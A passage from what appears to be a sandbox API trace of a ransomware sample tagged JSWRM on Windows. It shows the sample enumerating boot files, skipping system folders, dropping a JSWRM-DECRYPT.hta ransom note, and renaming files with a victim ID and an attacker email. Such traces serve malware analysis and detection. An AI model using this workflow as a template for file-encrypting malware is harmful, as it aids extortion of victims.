dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0063.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.659] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2=".") returned 1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="..") returned 1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="...") returned 1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="windows") returned -1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="recovery") returned -1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="perflogs") returned -1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="documents and settings") returned -1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="$RECYCLE.BIN") returned 1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="system volume information") returned -1 [0063.659] lstrcmpiW (lpString1="bootvhd.dll", lpString2="msocache") returned -1 [0063.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootvhd.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootvhd.dll", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootvhd.dll", lpUsedDefaultChar=0x0) returned 11 [0063.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootvhd.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootvhd.dll", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootvhd.dll", lpUsedDefaultChar=0x0) returned 11 [0063.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.660] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2=".") returned 1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="..") returned 1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="...") returned 1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="windows") returned -1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="recovery") returned -1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="perflogs") returned -1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="documents and settings") returned -1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="$RECYCLE.BIN") returned 1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="system volume information") returned -1 [0063.660] lstrcmpiW (lpString1="cs-CZ", lpString2="msocache") returned -1 [0063.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237218 [0063.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.660] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\cs-cz\\jswrm-decrypt.hta")) returned 0xffffffff [0063.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237218 | out: hHeap=0x1e0000) returned 1 [0063.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.662] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\cs-cz\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.663] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.663] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.664] CloseHandle (hObject=0x450) returned 1 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236d18 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.664] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\cs-cz\\jswrm-decrypt.hta")) returned 0x20 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236d18 | out: hHeap=0x1e0000) returned 1 [0063.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0063.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.664] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1c9c77f9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0063.664] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.664] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1c9c77f9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.665] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.665] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.665] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.665] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.666] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.666] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.666] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.666] CloseHandle (hObject=0xffffffff) returned 1 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0063.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0063.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.666] MoveFileW (lpExistingFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.666] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9c77f9, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1c9c77f9, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1c9c77f9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.667] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.667] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.668] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.668] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.668] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.668] 